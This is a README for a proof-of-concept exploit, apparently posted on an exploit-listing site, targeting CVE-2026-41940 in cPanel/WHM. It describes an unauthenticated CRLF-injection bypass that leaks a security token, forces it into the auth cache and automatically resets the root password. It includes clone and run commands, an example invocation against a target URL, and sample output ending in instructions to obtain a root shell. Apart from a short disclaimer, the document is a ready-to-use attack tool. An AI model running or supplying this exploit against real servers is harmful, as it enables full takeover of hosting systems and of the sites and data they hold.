## https://sploitus.com/exploit?id=BC436FB3-74DD-51CA-B4BA-C6E6D76DDA61
# CVE-2026-41940 Auto Exploit



---
## Overview
**CVE-2026-41940** is a proof-of-concept (PoC) exploit targeting **cPanel/WHM**.
This exploit demonstrates an **unauthenticated authentication bypass** using CRLF injection to leak security tokens and gain root-level access to the WHM interface, allowing for actions such as changing the root password.
> **Disclaimer:** This PoC is for educational purposes only. Do **not** use on systems without permission.
---
## Features
- **Hostname Auto-discovery**: Automatically identifies the canonical hostname to bypass Host header restrictions.
- **Pre-auth Session Minting**: Generates a valid initial session for injection.
- **CRLF Injection**: Leverages injection in headers to leak the `cp_security_token`.
- **Session Propagation**: Forces the leaked token into the server's auth cache.
- **Root Password Reset**: Automatically changes the WHM root password upon successful bypass.
- **Minimal Dependencies**: Works with the standard `requests` library.
---
## Installation
1. Clone the repository:
```bash
git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
```
2. Install dependencies:
```bash
pip install requests
```
> Requirements: `requests`, `urllib3`
---
## Usage
```bash
python3 CVE_2026_41940.py --target --password
```
### Example:
```bash
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!
```
### Arguments
| Flag | Description | Required | Default |
| ------------ | ------------------------- | -------- | ------- |
| `--target` | WHM Target URL (e.g., https://host:2087) | Yes | - |
| `--password` | New password for root user | Yes | - |
| `--hostname` | Override Host: header | No | Auto |
---
## Output
The console shows:
* Status messages `[0-4]`
* Success `[+]`
* Fail `[!]`
* Info `[*]`
Example:
```
[0] hostname = target.local
[1] minting a preauth session...
session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.110.0.12"}
[*] changing the root password
passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell
```
---
## Security & Disclaimer
* For **educational & testing purposes only**.
* Do **not** attack websites without explicit permission.
* Use in a controlled lab or authorized penetration test only.